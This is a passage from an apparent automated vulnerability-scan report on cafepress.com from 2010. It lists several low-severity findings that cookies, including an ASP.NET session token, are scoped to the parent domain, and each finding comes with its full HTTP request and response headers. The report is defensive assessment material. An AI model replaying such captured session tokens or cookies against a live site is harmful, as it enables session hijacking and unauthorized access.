Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59533
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.10. http://www.cafepress.com/+boxers
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+boxers
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59426
Date: Sun, 26 Dec 2010 13:47:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:02 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.11. http://www.cafepress.com/+bumper-stickers
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+bumper-stickers
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59721
Date: Sun, 26 Dec 2010 13:48:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.12. http://www.cafepress.com/+buttons
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+buttons
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59616 Date: Sun, 26 Dec 2010 13:48:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59616 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.13. http://www.cafepress.com/+calendars
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+calendars
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+calendars HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 57707 Date: Sun, 26 Dec 2010 13:48:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 57707 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.14. http://www.cafepress.com/+clocks
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+clocks
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+clocks HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59318 Date: Sun, 26 Dec 2010 13:48:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59318 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
2.15. http://www.cafepress.com/+coasters
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+coasters
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+coasters HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; 